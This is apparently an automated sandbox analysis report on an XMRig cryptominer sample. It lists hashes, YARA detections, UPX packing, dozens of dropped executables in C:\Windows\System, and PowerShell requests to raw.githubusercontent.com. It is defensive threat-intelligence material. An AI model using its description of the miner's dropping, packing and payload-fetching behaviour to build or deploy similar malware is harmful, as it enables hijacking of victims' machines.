xmrig | 1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d

Analysis

max time kernel
155s
max time network
159s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
05/03/2024, 18:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
Size

1.3MB
MD5

014fdd251dea38e64100cb1d3bfe0168
SHA1

89dec1f01ff661d548bcfac300445bc6c669d464
SHA256

1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d
SHA512

bb20efc1589d5b20d8b0294167a1d04504af41f37cdb2e96a2bfd2ae0939c25369fba481248cb8fe3c5294b92335b076b85d59d05444362f5007de256889c840
SSDEEP

24576:zv3/fTLF671TilQFG4P5PMkUCCWvLEvjuJoCSxnhvwFrqHyyZS:Lz071uv4BPMkHC0I6GCInhGOZS

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detects executables containing URLs to raw contents of a Github gist 55 IoCs

resource	yara_rule
behavioral2/memory/1276-48-0x00007FF64D580000-0x00007FF64D972000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4108-49-0x00007FF7BCD60000-0x00007FF7BD152000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5056-50-0x00007FF7A79A0000-0x00007FF7A7D92000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4688-47-0x00007FF6E29B0000-0x00007FF6E2DA2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2064-40-0x00007FF72A9F0000-0x00007FF72ADE2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1072-88-0x00007FF6133C0000-0x00007FF6137B2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1204-91-0x00007FF69BF60000-0x00007FF69C352000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4080-94-0x00007FF7E4730000-0x00007FF7E4B22000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/404-95-0x00007FF77F070000-0x00007FF77F462000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2688-96-0x00007FF6C4A80000-0x00007FF6C4E72000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3900-97-0x00007FF706300000-0x00007FF7066F2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2632-538-0x00007FF699A10000-0x00007FF699E02000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4120-541-0x00007FF607470000-0x00007FF607862000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2456-520-0x00007FF761570000-0x00007FF761962000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4928-750-0x00007FF6172A0000-0x00007FF617692000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3908-810-0x00007FF79A100000-0x00007FF79A4F2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2792-820-0x00007FF639310000-0x00007FF639702000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/372-835-0x00007FF74AD10000-0x00007FF74B102000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1964-843-0x00007FF795870000-0x00007FF795C62000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1664-851-0x00007FF7D6D80000-0x00007FF7D7172000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3704-871-0x00007FF76B320000-0x00007FF76B712000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4116-901-0x00007FF75E8B0000-0x00007FF75ECA2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4524-909-0x00007FF68F0A0000-0x00007FF68F492000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4460-921-0x00007FF7DFCC0000-0x00007FF7E00B2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3660-928-0x00007FF6DF6A0000-0x00007FF6DFA92000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1972-937-0x00007FF773310000-0x00007FF773702000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4408-984-0x00007FF6C5230000-0x00007FF6C5622000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4800-996-0x00007FF6D88D0000-0x00007FF6D8CC2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4368-997-0x00007FF7184C0000-0x00007FF7188B2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2372-998-0x00007FF7A0840000-0x00007FF7A0C32000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3752-999-0x00007FF756220000-0x00007FF756612000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3868-1002-0x00007FF78ED50000-0x00007FF78F142000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2976-1006-0x00007FF6F7FA0000-0x00007FF6F8392000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5088-1008-0x00007FF666FC0000-0x00007FF6673B2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3484-1014-0x00007FF6E8EF0000-0x00007FF6E92E2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5044-1018-0x00007FF66B100000-0x00007FF66B4F2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4232-1019-0x00007FF6E5680000-0x00007FF6E5A72000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2132-1023-0x00007FF7BA0C0000-0x00007FF7BA4B2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2804-1046-0x00007FF7B2310000-0x00007FF7B2702000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2464-1050-0x00007FF710C60000-0x00007FF711052000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2952-1054-0x00007FF630A90000-0x00007FF630E82000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2448-1063-0x00007FF6EF930000-0x00007FF6EFD22000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4432-1059-0x00007FF602B20000-0x00007FF602F12000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/904-1036-0x00007FF61D2D0000-0x00007FF61D6C2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4964-1095-0x00007FF610B30000-0x00007FF610F22000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4584-1033-0x00007FF7B7090000-0x00007FF7B7482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4468-1027-0x00007FF6F8C40000-0x00007FF6F9032000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2820-1013-0x00007FF7DC100000-0x00007FF7DC4F2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2708-1007-0x00007FF6D82A0000-0x00007FF6D8692000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/504-992-0x00007FF636140000-0x00007FF636532000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1580-924-0x00007FF7A0FF0000-0x00007FF7A13E2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2356-876-0x00007FF7D8080000-0x00007FF7D8472000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2136-846-0x00007FF7E93A0000-0x00007FF7E9792000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4696-786-0x00007FF6D9A40000-0x00007FF6D9E32000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5068-769-0x00007FF6B0450000-0x00007FF6B0842000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL

UPX dump on OEP (original entry point) 64 IoCs

resource	yara_rule
behavioral2/memory/4732-0-0x00007FF7EDCA0000-0x00007FF7EE092000-memory.dmp	UPX
behavioral2/files/0x0007000000023238-7.dat	UPX
behavioral2/files/0x0008000000023234-8.dat	UPX
behavioral2/files/0x0007000000023239-20.dat	UPX
behavioral2/memory/3128-24-0x00007FF61FEE0000-0x00007FF6202D2000-memory.dmp	UPX
behavioral2/files/0x000700000002323d-37.dat	UPX
behavioral2/files/0x0007000000023239-36.dat	UPX
behavioral2/files/0x000700000002323d-39.dat	UPX
behavioral2/files/0x000700000002323b-42.dat	UPX
behavioral2/memory/3228-45-0x00007FF7DCDC0000-0x00007FF7DD1B2000-memory.dmp	UPX
behavioral2/memory/1276-48-0x00007FF64D580000-0x00007FF64D972000-memory.dmp	UPX
behavioral2/memory/4108-49-0x00007FF7BCD60000-0x00007FF7BD152000-memory.dmp	UPX
behavioral2/memory/5056-50-0x00007FF7A79A0000-0x00007FF7A7D92000-memory.dmp	UPX
behavioral2/memory/4688-47-0x00007FF6E29B0000-0x00007FF6E2DA2000-memory.dmp	UPX
behavioral2/memory/2064-40-0x00007FF72A9F0000-0x00007FF72ADE2000-memory.dmp	UPX
behavioral2/files/0x000700000002323c-41.dat	UPX
behavioral2/files/0x000700000002323c-35.dat	UPX
behavioral2/files/0x000700000002323e-54.dat	UPX
behavioral2/files/0x000700000002323e-53.dat	UPX
behavioral2/files/0x000700000002323a-32.dat	UPX
behavioral2/files/0x0008000000023243-77.dat	UPX
behavioral2/memory/1072-88-0x00007FF6133C0000-0x00007FF6137B2000-memory.dmp	UPX
behavioral2/memory/1204-91-0x00007FF69BF60000-0x00007FF69C352000-memory.dmp	UPX
behavioral2/memory/4080-94-0x00007FF7E4730000-0x00007FF7E4B22000-memory.dmp	UPX
behavioral2/memory/404-95-0x00007FF77F070000-0x00007FF77F462000-memory.dmp	UPX
behavioral2/memory/2688-96-0x00007FF6C4A80000-0x00007FF6C4E72000-memory.dmp	UPX
behavioral2/memory/3900-97-0x00007FF706300000-0x00007FF7066F2000-memory.dmp	UPX
behavioral2/files/0x0008000000023235-102.dat	UPX
behavioral2/files/0x0007000000023248-111.dat	UPX
behavioral2/files/0x0007000000023249-119.dat	UPX
behavioral2/files/0x000700000002324c-135.dat	UPX
behavioral2/files/0x000700000002324f-152.dat	UPX
behavioral2/files/0x0007000000023256-179.dat	UPX
behavioral2/files/0x0007000000023258-189.dat	UPX
behavioral2/files/0x0007000000023256-187.dat	UPX
behavioral2/files/0x0007000000023257-184.dat	UPX
behavioral2/files/0x0007000000023255-182.dat	UPX
behavioral2/files/0x0007000000023254-177.dat	UPX
behavioral2/files/0x0007000000023253-172.dat	UPX
behavioral2/files/0x0007000000023252-167.dat	UPX
behavioral2/files/0x0007000000023251-162.dat	UPX
behavioral2/files/0x0007000000023250-157.dat	UPX
behavioral2/files/0x000700000002324e-147.dat	UPX
behavioral2/files/0x000700000002324f-144.dat	UPX
behavioral2/files/0x000700000002324d-139.dat	UPX
behavioral2/files/0x000700000002324c-131.dat	UPX
behavioral2/files/0x000700000002324b-129.dat	UPX
behavioral2/files/0x000700000002324a-125.dat	UPX
behavioral2/files/0x0007000000023248-115.dat	UPX
behavioral2/files/0x0007000000023249-114.dat	UPX
behavioral2/files/0x0007000000023247-109.dat	UPX
behavioral2/files/0x0008000000023235-101.dat	UPX
behavioral2/files/0x0007000000023246-92.dat	UPX
behavioral2/files/0x0007000000023244-85.dat	UPX
behavioral2/files/0x0007000000023241-72.dat	UPX
behavioral2/files/0x000700000002323f-58.dat	UPX
behavioral2/memory/4916-13-0x00007FF6E4360000-0x00007FF6E4752000-memory.dmp	UPX
behavioral2/files/0x0008000000023231-9.dat	UPX
behavioral2/memory/2632-538-0x00007FF699A10000-0x00007FF699E02000-memory.dmp	UPX
behavioral2/memory/4120-541-0x00007FF607470000-0x00007FF607862000-memory.dmp	UPX
behavioral2/memory/2456-520-0x00007FF761570000-0x00007FF761962000-memory.dmp	UPX
behavioral2/memory/4928-750-0x00007FF6172A0000-0x00007FF617692000-memory.dmp	UPX
behavioral2/memory/3908-810-0x00007FF79A100000-0x00007FF79A4F2000-memory.dmp	UPX
behavioral2/memory/2792-820-0x00007FF639310000-0x00007FF639702000-memory.dmp	UPX

XMRig Miner payload 55 IoCs

miner

resource	yara_rule
behavioral2/memory/1276-48-0x00007FF64D580000-0x00007FF64D972000-memory.dmp	xmrig
behavioral2/memory/4108-49-0x00007FF7BCD60000-0x00007FF7BD152000-memory.dmp	xmrig
behavioral2/memory/5056-50-0x00007FF7A79A0000-0x00007FF7A7D92000-memory.dmp	xmrig
behavioral2/memory/4688-47-0x00007FF6E29B0000-0x00007FF6E2DA2000-memory.dmp	xmrig
behavioral2/memory/2064-40-0x00007FF72A9F0000-0x00007FF72ADE2000-memory.dmp	xmrig
behavioral2/memory/1072-88-0x00007FF6133C0000-0x00007FF6137B2000-memory.dmp	xmrig
behavioral2/memory/1204-91-0x00007FF69BF60000-0x00007FF69C352000-memory.dmp	xmrig
behavioral2/memory/4080-94-0x00007FF7E4730000-0x00007FF7E4B22000-memory.dmp	xmrig
behavioral2/memory/404-95-0x00007FF77F070000-0x00007FF77F462000-memory.dmp	xmrig
behavioral2/memory/2688-96-0x00007FF6C4A80000-0x00007FF6C4E72000-memory.dmp	xmrig
behavioral2/memory/3900-97-0x00007FF706300000-0x00007FF7066F2000-memory.dmp	xmrig
behavioral2/memory/2632-538-0x00007FF699A10000-0x00007FF699E02000-memory.dmp	xmrig
behavioral2/memory/4120-541-0x00007FF607470000-0x00007FF607862000-memory.dmp	xmrig
behavioral2/memory/2456-520-0x00007FF761570000-0x00007FF761962000-memory.dmp	xmrig
behavioral2/memory/4928-750-0x00007FF6172A0000-0x00007FF617692000-memory.dmp	xmrig
behavioral2/memory/3908-810-0x00007FF79A100000-0x00007FF79A4F2000-memory.dmp	xmrig
behavioral2/memory/2792-820-0x00007FF639310000-0x00007FF639702000-memory.dmp	xmrig
behavioral2/memory/372-835-0x00007FF74AD10000-0x00007FF74B102000-memory.dmp	xmrig
behavioral2/memory/1964-843-0x00007FF795870000-0x00007FF795C62000-memory.dmp	xmrig
behavioral2/memory/1664-851-0x00007FF7D6D80000-0x00007FF7D7172000-memory.dmp	xmrig
behavioral2/memory/3704-871-0x00007FF76B320000-0x00007FF76B712000-memory.dmp	xmrig
behavioral2/memory/4116-901-0x00007FF75E8B0000-0x00007FF75ECA2000-memory.dmp	xmrig
behavioral2/memory/4524-909-0x00007FF68F0A0000-0x00007FF68F492000-memory.dmp	xmrig
behavioral2/memory/4460-921-0x00007FF7DFCC0000-0x00007FF7E00B2000-memory.dmp	xmrig
behavioral2/memory/3660-928-0x00007FF6DF6A0000-0x00007FF6DFA92000-memory.dmp	xmrig
behavioral2/memory/1972-937-0x00007FF773310000-0x00007FF773702000-memory.dmp	xmrig
behavioral2/memory/4408-984-0x00007FF6C5230000-0x00007FF6C5622000-memory.dmp	xmrig
behavioral2/memory/4800-996-0x00007FF6D88D0000-0x00007FF6D8CC2000-memory.dmp	xmrig
behavioral2/memory/4368-997-0x00007FF7184C0000-0x00007FF7188B2000-memory.dmp	xmrig
behavioral2/memory/2372-998-0x00007FF7A0840000-0x00007FF7A0C32000-memory.dmp	xmrig
behavioral2/memory/3752-999-0x00007FF756220000-0x00007FF756612000-memory.dmp	xmrig
behavioral2/memory/3868-1002-0x00007FF78ED50000-0x00007FF78F142000-memory.dmp	xmrig
behavioral2/memory/2976-1006-0x00007FF6F7FA0000-0x00007FF6F8392000-memory.dmp	xmrig
behavioral2/memory/5088-1008-0x00007FF666FC0000-0x00007FF6673B2000-memory.dmp	xmrig
behavioral2/memory/3484-1014-0x00007FF6E8EF0000-0x00007FF6E92E2000-memory.dmp	xmrig
behavioral2/memory/5044-1018-0x00007FF66B100000-0x00007FF66B4F2000-memory.dmp	xmrig
behavioral2/memory/4232-1019-0x00007FF6E5680000-0x00007FF6E5A72000-memory.dmp	xmrig
behavioral2/memory/2132-1023-0x00007FF7BA0C0000-0x00007FF7BA4B2000-memory.dmp	xmrig
behavioral2/memory/2804-1046-0x00007FF7B2310000-0x00007FF7B2702000-memory.dmp	xmrig
behavioral2/memory/2464-1050-0x00007FF710C60000-0x00007FF711052000-memory.dmp	xmrig
behavioral2/memory/2952-1054-0x00007FF630A90000-0x00007FF630E82000-memory.dmp	xmrig
behavioral2/memory/2448-1063-0x00007FF6EF930000-0x00007FF6EFD22000-memory.dmp	xmrig
behavioral2/memory/4432-1059-0x00007FF602B20000-0x00007FF602F12000-memory.dmp	xmrig
behavioral2/memory/904-1036-0x00007FF61D2D0000-0x00007FF61D6C2000-memory.dmp	xmrig
behavioral2/memory/4964-1095-0x00007FF610B30000-0x00007FF610F22000-memory.dmp	xmrig
behavioral2/memory/4584-1033-0x00007FF7B7090000-0x00007FF7B7482000-memory.dmp	xmrig
behavioral2/memory/4468-1027-0x00007FF6F8C40000-0x00007FF6F9032000-memory.dmp	xmrig
behavioral2/memory/2820-1013-0x00007FF7DC100000-0x00007FF7DC4F2000-memory.dmp	xmrig
behavioral2/memory/2708-1007-0x00007FF6D82A0000-0x00007FF6D8692000-memory.dmp	xmrig
behavioral2/memory/504-992-0x00007FF636140000-0x00007FF636532000-memory.dmp	xmrig
behavioral2/memory/1580-924-0x00007FF7A0FF0000-0x00007FF7A13E2000-memory.dmp	xmrig
behavioral2/memory/2356-876-0x00007FF7D8080000-0x00007FF7D8472000-memory.dmp	xmrig
behavioral2/memory/2136-846-0x00007FF7E93A0000-0x00007FF7E9792000-memory.dmp	xmrig
behavioral2/memory/4696-786-0x00007FF6D9A40000-0x00007FF6D9E32000-memory.dmp	xmrig
behavioral2/memory/5068-769-0x00007FF6B0450000-0x00007FF6B0842000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
8	5092	powershell.exe
12	5092	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
4916	EOHtnCI.exe
1276	WcNzBhl.exe
3128	MwfdnXv.exe
4108	ZAVMxAO.exe
2064	aahzKFI.exe
3228	otXqFhQ.exe
4688	tRSxfec.exe
5056	QARzNOr.exe
2688	eOJEoOn.exe
1072	OZAMHYR.exe
1204	DjExygq.exe
4080	ZlCjPjR.exe
404	CnkWFID.exe
3900	mDcwUBf.exe
2456	jVlmRNE.exe
2632	IAHnWpu.exe
4120	QrkUvxe.exe
4928	gANjdae.exe
5068	AtXxvTX.exe
4696	ALCeALP.exe
3908	EjofqRI.exe
2792	FqIUriK.exe
372	EWGGgcD.exe
1964	bRDIdWW.exe
2136	aBXVZZu.exe
1664	uGxADvQ.exe
3704	DckOVQG.exe
2356	tkDHCBf.exe
4116	lyNCpLn.exe
4524	pCWWpmG.exe
4460	Qqhyckr.exe
1580	zFVtCBZ.exe
3660	DMokmwk.exe
1972	eFtSDJq.exe
4408	TldijFu.exe
504	GgjgyQU.exe
4800	CmHpQmO.exe
4368	KxAsYmV.exe
2372	zHLGkHd.exe
3752	cumntML.exe
3868	ViKzdKv.exe
2976	RsbnzXz.exe
2708	RrdKoOA.exe
5088	sRALqWS.exe
2820	oabFEuH.exe
3484	EmmsZxP.exe
5044	ErZfrRL.exe
4232	XevEhQf.exe
2132	UZBqqyn.exe
4468	Fkuxnfb.exe
4584	VZPBnmG.exe
904	MQGqqaE.exe
2804	caUVnZd.exe
2464	paRgnFR.exe
2952	gHXRyyP.exe
4432	gttXpge.exe
2448	luQEhPa.exe
4964	UXQHNTE.exe
4016	cLBjmrl.exe
2592	QcUWwDw.exe
2908	SkSkQpZ.exe
4852	ZUdPzrV.exe
4332	ChyIGiY.exe
3008	jKnXRCE.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4732-0-0x00007FF7EDCA0000-0x00007FF7EE092000-memory.dmp	upx
behavioral2/files/0x0007000000023238-7.dat	upx
behavioral2/files/0x0008000000023234-8.dat	upx
behavioral2/files/0x0007000000023239-20.dat	upx
behavioral2/memory/3128-24-0x00007FF61FEE0000-0x00007FF6202D2000-memory.dmp	upx
behavioral2/files/0x000700000002323d-37.dat	upx
behavioral2/files/0x0007000000023239-36.dat	upx
behavioral2/files/0x000700000002323d-39.dat	upx
behavioral2/files/0x000700000002323b-42.dat	upx
behavioral2/memory/3228-45-0x00007FF7DCDC0000-0x00007FF7DD1B2000-memory.dmp	upx
behavioral2/memory/1276-48-0x00007FF64D580000-0x00007FF64D972000-memory.dmp	upx
behavioral2/memory/4108-49-0x00007FF7BCD60000-0x00007FF7BD152000-memory.dmp	upx
behavioral2/memory/5056-50-0x00007FF7A79A0000-0x00007FF7A7D92000-memory.dmp	upx
behavioral2/memory/4688-47-0x00007FF6E29B0000-0x00007FF6E2DA2000-memory.dmp	upx
behavioral2/memory/2064-40-0x00007FF72A9F0000-0x00007FF72ADE2000-memory.dmp	upx
behavioral2/files/0x000700000002323c-41.dat	upx
behavioral2/files/0x000700000002323c-35.dat	upx
behavioral2/files/0x000700000002323e-54.dat	upx
behavioral2/files/0x000700000002323e-53.dat	upx
behavioral2/files/0x000700000002323a-32.dat	upx
behavioral2/files/0x0008000000023243-77.dat	upx
behavioral2/memory/1072-88-0x00007FF6133C0000-0x00007FF6137B2000-memory.dmp	upx
behavioral2/memory/1204-91-0x00007FF69BF60000-0x00007FF69C352000-memory.dmp	upx
behavioral2/memory/4080-94-0x00007FF7E4730000-0x00007FF7E4B22000-memory.dmp	upx
behavioral2/memory/404-95-0x00007FF77F070000-0x00007FF77F462000-memory.dmp	upx
behavioral2/memory/2688-96-0x00007FF6C4A80000-0x00007FF6C4E72000-memory.dmp	upx
behavioral2/memory/3900-97-0x00007FF706300000-0x00007FF7066F2000-memory.dmp	upx
behavioral2/files/0x0008000000023235-102.dat	upx
behavioral2/files/0x0007000000023248-111.dat	upx
behavioral2/files/0x0007000000023249-119.dat	upx
behavioral2/files/0x000700000002324c-135.dat	upx
behavioral2/files/0x000700000002324f-152.dat	upx
behavioral2/files/0x0007000000023256-179.dat	upx
behavioral2/files/0x0007000000023258-189.dat	upx
behavioral2/files/0x0007000000023256-187.dat	upx
behavioral2/files/0x0007000000023257-184.dat	upx
behavioral2/files/0x0007000000023255-182.dat	upx
behavioral2/files/0x0007000000023254-177.dat	upx
behavioral2/files/0x0007000000023253-172.dat	upx
behavioral2/files/0x0007000000023252-167.dat	upx
behavioral2/files/0x0007000000023251-162.dat	upx
behavioral2/files/0x0007000000023250-157.dat	upx
behavioral2/files/0x000700000002324e-147.dat	upx
behavioral2/files/0x000700000002324f-144.dat	upx
behavioral2/files/0x000700000002324d-139.dat	upx
behavioral2/files/0x000700000002324c-131.dat	upx
behavioral2/files/0x000700000002324b-129.dat	upx
behavioral2/files/0x000700000002324a-125.dat	upx
behavioral2/files/0x0007000000023248-115.dat	upx
behavioral2/files/0x0007000000023249-114.dat	upx
behavioral2/files/0x0007000000023247-109.dat	upx
behavioral2/files/0x0008000000023235-101.dat	upx
behavioral2/files/0x0007000000023246-92.dat	upx
behavioral2/files/0x0007000000023244-85.dat	upx
behavioral2/files/0x0007000000023241-72.dat	upx
behavioral2/files/0x000700000002323f-58.dat	upx
behavioral2/memory/4916-13-0x00007FF6E4360000-0x00007FF6E4752000-memory.dmp	upx
behavioral2/files/0x0008000000023231-9.dat	upx
behavioral2/memory/2632-538-0x00007FF699A10000-0x00007FF699E02000-memory.dmp	upx
behavioral2/memory/4120-541-0x00007FF607470000-0x00007FF607862000-memory.dmp	upx
behavioral2/memory/2456-520-0x00007FF761570000-0x00007FF761962000-memory.dmp	upx
behavioral2/memory/4928-750-0x00007FF6172A0000-0x00007FF617692000-memory.dmp	upx
behavioral2/memory/3908-810-0x00007FF79A100000-0x00007FF79A4F2000-memory.dmp	upx
behavioral2/memory/2792-820-0x00007FF639310000-0x00007FF639702000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
7	raw.githubusercontent.com
8	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\CmssvYw.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\vQVrCMJ.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\yZQPoae.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\KGpDfAu.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\dnzGKGt.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\vagrTJZ.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\CnkWFID.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\XDVXjJP.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\imHdFkn.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\xzfTDQZ.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\xgjDKbf.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\nQWKXEM.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\RsZmbrI.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\tixLVQy.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\xcPcHyl.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\WnpZtvB.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\jHAyRVW.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\DrstmPv.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\sGhOSOe.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\ttzLjGN.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\LfDgotP.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\WcNzBhl.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\eXNDORN.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\cvPDTpQ.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\tHbFJOb.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\rgpupjh.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\XQbNnba.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
